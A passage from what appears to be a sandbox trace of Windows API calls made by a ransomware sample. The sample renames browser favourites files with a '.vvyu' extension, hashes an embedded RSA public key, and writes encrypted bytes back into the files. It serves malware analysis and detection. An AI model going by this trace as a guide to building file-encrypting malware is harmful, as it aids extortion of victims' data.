"c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url.vvyu")) returned 1 [0194.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.433] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.452] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0194.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0194.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.453] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0194.464] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.465] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0194.465] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.468] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.468] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.470] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.470] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0194.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.470] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.471] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.471] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.471] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.471] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.471] GetLastError () returned 0x0 [0194.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.472] GetLastError () returned 0x0 [0194.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.472] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.472] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.472] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.473] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.473] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.473] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3f18 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2530 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.474] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0194.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6338 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6320 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0194.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.477] GetCurrentThreadId () returned 0x5d8 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7c38 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.477] GetCurrentThreadId () returned 0x5d8 [0194.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6338 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6398 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63b0 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6350 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6320 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0194.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0194.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0194.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2530 | out: hHeap=0x2c0000) returned 1 [0194.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.489] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.490] HeapFree (in: hHeap=0x2c0000, 